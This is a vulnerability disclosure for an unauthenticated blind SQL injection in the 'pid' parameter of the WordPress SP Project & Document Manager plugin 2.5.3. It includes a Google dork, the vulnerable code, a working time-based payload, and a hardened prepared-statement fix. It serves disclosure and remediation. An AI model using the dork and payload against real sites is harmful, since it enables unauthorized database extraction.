# Exploit Title: WordPress SP Project & Document Manager 2.5.3 Blind SQL Injection
# Google Dork: inurl:wp-content/plugins/sp-client-document-manager
# Date: 2015-03-04
# Exploit Author: catsecurity
# Vendor Homepage: http://smartypantsplugins.com
# Software Link: https://downloads.wordpress.org/plugin/sp-client-document-manager.2.5.3.zip
# Version: 2.5.3 and earlier
# Tested on: Chrome (It's PHP Application)
# CVE : N/A

# Timeline #

[2015.03.05] Reported to the Vendor
[2015.03.06?] Fixed in Update 2.5.4

# Details #

- The plugin does not validate that an integer parameter is actually numeric before using it in SQL. Unauthenticated users can attack websites that use this plugin.
- The vulnerable code is in the thumbnails() function in [ /wp-content/plugins/sp-client-document-manager/ajax.php ].
- The "pid" parameter is not sanitized.

# Vulnerable code #

Line 1132: echo '<div id="dlg_cdm_thumbnails">';
Line 1133: if ($_GET['pid'] != "") {
Line 1134: $r_current_project = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "sp_cu_project WHERE id = " . $_GET['pid'] . "", ARRAY_A);
Line 1135: }

# POC #

/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=[SQLi]

example:

/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=if(substr(database(),1,1)=0x61,sleep(5),1)

If the condition is true, the response is delayed by 5 seconds.

This vulnerable parameter must be cast to an integer.
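A hardened version of the block at lines 1132-1135, added here as an illustration of the fix described above (it is not the plugin's own code or its 2.5.4 update): the parameter is checked to be a plain decimal integer and the query is built with `$wpdb->prepare()` and the `%d` placeholder, so the value can never alter the query structure. It assumes the WordPress `$wpdb` global is in scope, as it is in ajax.php.

```php
<?php
// Added illustration of the remediation, not the plugin's own code.
// Assumes the WordPress $wpdb global is available (as in ajax.php).

echo '<div id="dlg_cdm_thumbnails">';

// Reject anything that is not a plain decimal integer before it reaches SQL.
if (isset($_GET['pid']) && ctype_digit((string) $_GET['pid'])) {
    $pid = absint($_GET['pid']); // WordPress helper: non-negative integer

    // %d is an integer placeholder; prepare() emits the literal number,
    // so user input cannot change the structure of the statement.
    $r_current_project = $wpdb->get_results(
        $wpdb->prepare(
            "SELECT * FROM {$wpdb->prefix}sp_cu_project WHERE id = %d",
            $pid
        ),
        ARRAY_A
    );
} else {
    // A non-numeric pid (such as a crafted expression) is never queried.
    $r_current_project = array();
}
```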